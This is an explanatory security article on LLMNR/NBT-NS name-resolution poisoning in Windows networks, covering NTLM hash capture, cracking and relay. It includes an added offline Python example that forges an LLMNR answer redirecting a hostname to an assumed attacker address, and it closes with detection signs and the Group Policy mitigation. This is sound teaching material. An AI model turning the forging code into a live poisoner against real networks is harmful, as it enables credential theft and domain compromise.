A common misconception among Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network that is fully patched and running the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in many cases privileged credentials, that can be leveraged to gain control over the entire domain. The weaknesses described below are protocol and configuration defaults, not missing patches.
One of the most popular methods used by penetration test teams in an internal engagement is to listen for Windows broadcast traffic on the local network segment. When DNS cannot resolve a name, Windows falls back to broadcast name resolution (LLMNR and NBT-NS), and any host on the segment can answer. By intercepting and manipulating that name resolution traffic, an attacker who replies with their own address can redirect the resulting authentication traffic to the attacker's machine in a Man-in-the-Middle (MitM) attack. What the attacker captures is the NTLM challenge-response handshake (a NetNTLMv1 or NetNTLMv2 hash), not the password itself, but it can be subjected to an offline brute force or dictionary cracking attack in order to obtain the clear-text credentials. Even if the passwords in use are sufficiently complex to prevent them being cracked within a realistic timeframe, the authentication attempt can be relayed to another host that does not require signing, in order to grant the attacker access to resources as the victim user.
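The poisoning exchange described above, as an added example that is not part of the original article and not the code of any tool it alludes to: a constructed LLMNR query for the hypothetical host name "fileserv01" is parsed, a forged answer pointing at an assumed attacker address (10.0.0.99) is built exactly as a poisoner would build it, and the answer is decoded again to show what the victim's resolver would accept. Everything runs offline on byte strings built inline; no packets are sent.

```python
"""
Added example, not from the original article: an offline model of the LLMNR
poisoning exchange (RFC 4795). The header is DNS-shaped: id, flags, qdcount,
ancount, nscount, arcount. A poisoner copies the victim's transaction ID and
question, sets the QR bit, and appends an A record for its own address.
Host name, transaction ID and attacker IP below are constructed assumptions.
"""
import socket
import struct

LLMNR_PORT = 5355              # UDP port LLMNR queries are multicast to
LLMNR_MCAST = "224.0.0.252"    # IPv4 multicast group for LLMNR
ATTACKER_IP = "10.0.0.99"      # assumption: the attacker-controlled listener


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(buf: bytes, offset: int):
    """Decode a label sequence at offset and return (name, next_offset).
    LLMNR queries carry no compression pointers, so one is treated as malformed."""
    labels = []
    while True:
        length = buf[offset]
        if length & 0xC0:
            raise ValueError("compression pointer not supported")
        offset += 1
        if length == 0:
            break
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Build the query a Windows host multicasts when DNS fails for `name`."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(pkt: bytes):
    """Extract transaction ID and the single question from a query packet."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:
        raise ValueError("not a query (QR bit set)")
    if qd != 1:
        raise ValueError("expected exactly one question")
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass}


def build_poisoned_response(query: bytes, answer_ip: str) -> bytes:
    """Forge the answer a poisoner sends: same txid and question, QR=1, plus
    one A record (type 1, class 1, TTL 30) mapping the name to answer_ip.
    The victim never checks who answered, so this is accepted as authoritative."""
    q = parse_query(query)
    header = struct.pack("!HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)
    question = encode_name(q["name"]) + struct.pack("!HH", q["qtype"], q["qclass"])
    rdata = socket.inet_aton(answer_ip)
    answer = encode_name(q["name"]) + struct.pack("!HHIH", 1, 1, 30, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt: bytes):
    """Decode the first answer record the way the victim's resolver would."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    _, off = decode_name(pkt, 12)
    off += 4  # skip qtype/qclass of the echoed question
    aname, off = decode_name(pkt, off)
    rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    ip = socket.inet_ntoa(pkt[off:off + rdlen])
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "name": aname, "type": rtype, "ttl": ttl, "ip": ip}


def poison_demo(hostname: str = "fileserv01", txid: int = 0x1A2B):
    """Constructed victim query for a name absent from DNS, and the forged reply."""
    query = build_query(txid, hostname)
    reply = build_poisoned_response(query, ATTACKER_IP)
    return parse_response(reply)


if __name__ == "__main__":
    print(poison_demo())
```

The victim's SMB or HTTP client then connects to 10.0.0.99 and authenticates with NTLM, which is the point at which the challenge-response handshake is captured or relayed. The same packet shape is also what a network detection would look for: unsolicited LLMNR answers on UDP 5355 from a host that is not the name being queried, or answers for names such as wpad that should never resolve on the segment. Disabling LLMNR and NBT-NS via Group Policy removes the fallback entirely.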